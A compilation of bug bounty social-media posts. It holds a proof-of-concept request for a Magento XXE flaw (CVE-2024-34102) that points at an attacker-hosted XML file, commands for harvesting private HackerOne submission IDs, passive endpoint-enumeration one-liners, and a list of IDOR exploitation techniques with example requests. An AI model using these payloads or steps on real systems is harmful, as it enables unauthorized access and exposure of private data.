Looking for someone who can contribute on the next 30 days Bug Bounty Challenge.

Similar to this https://nas.io/brutsecurity

CVE-2024-34102 POC

POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}

IDOR on HackerOne Embedded Submission Form 💰 💲
-
Steps to reproduce (obtaining inactive UUID of many private programs)

1- Use this command echo 'https://hackerone.com/' | waybackurls > lists.txt make sure you have waybackurls installed on your attackbox
2- cat lists.txt | grep "embedded_submissions" > results.txt
3- cat results.txt
4- You will find a lot of embedded submission id of many random private programs, you can check it by browsing each URL
-
https://lnkd.in/drCHC6qA
-
By @japzdivino
https://x.com/japzdivino

⚔️Pentest-Windows
🔰Windows11 Penetration Suite Toolkit

📌A Windows penetration testing environment that works out of the box.

⚠️This project was created for educational purposes and should not be used in environments without legal authorization.

🔗Link: https://lnkd.in/gtX3GbR8

🔖#infosec #cybersecurity #hacking #pentesting #security #infosec #cybersecurity #hacking #pentesting #security #oscp #ceh #nmap #infosec #hackingtools #networksecurity

📢You can now passively enumerate all endpoints of a website with katana. (No need waybackurls)

📝Example:

echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints

🚨You can then check the status of these endpoints or filter in order to find new vulnerabilities:

⚠Example:

echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints

💪🏻Scan for Adobe Commerce & Magento - XXE

(CVE-2024-34102) discovered by Sergey Temnikov using Nuclei Template @pdnuclei

🔍 Details: https://lnkd.in/dBy32DtY

📑 Nuclei Template: https://lnkd.in/dUNFMUny

🔧 GitHub PR: https://lnkd.in/dqu65C5i

#bugbounty #adobe #pdteam #infos

Advanced IDORs - 9 Techniques by Intigriti:

1. Exploiting Basic IDORs

How to: Modify a predictable numeric ID in the request URL or parameters.
Example: GET /user/email?userId=1002 (change userId to another value).

2. Exploiting IDORs via Parameter Pollution

How to: Inject multiple instances of the same parameter in the request.
Example: POST /update_profile with user_id=1234&user_id=5678.

3. Exploiting IDORs via JSON Globbing

How to: Manipulate JSON fields with arrays, booleans, wildcards, or large integers.
Example: { "user_id": ["1234", "5678"] } or { "user_id": "*" }.

4. Exploiting Method-Based IDORs

How to: Change the HTTP method to bypass access controls.
Example: Change GET /user/data to POST /user/data.

5. Exploiting Content-Type-Based IDORs

How to: Alter the Content-Type header to manipulate request processing.
Example: Use Content-Type: application/json instead of Content-Type: text/plain.

6. Exploiting IDORs via Deprecated API Versions

How to: Use older API versions that may lack updated security checks.
Example: Access /v1/user/data instead of /v2/user/data.

7. Exploiting IDORs in APIs that Use Static Keywords

How to: Replace keywords like current or me with numerical user IDs.
Example: Change /user/profile/current to /user/profile/1002.

8. Exploiting IDORs that Require Unpredictable IDs

How to: Find references to UUIDs or hashes in other parts of the application.
Example: Extract UUID from profile URLs like /profile/123e4567-e89b-12d3-a456-426614174000.

9. Exploiting Second-Order IDOR Vulnerabilities

How to: Manipulate stored IDs used in subsequent processes.
Example: Submit a form that stores your ID, then trigger an export process that retrieves data using that stored ID.
----------------------------------------------------------

I've never seen real-world examples for some of them, but they are definitely worth the try.

#pentesting #appsec #bugbounty #cybersecurity

Here's the full scoop: https://buff.ly/3zfhhzL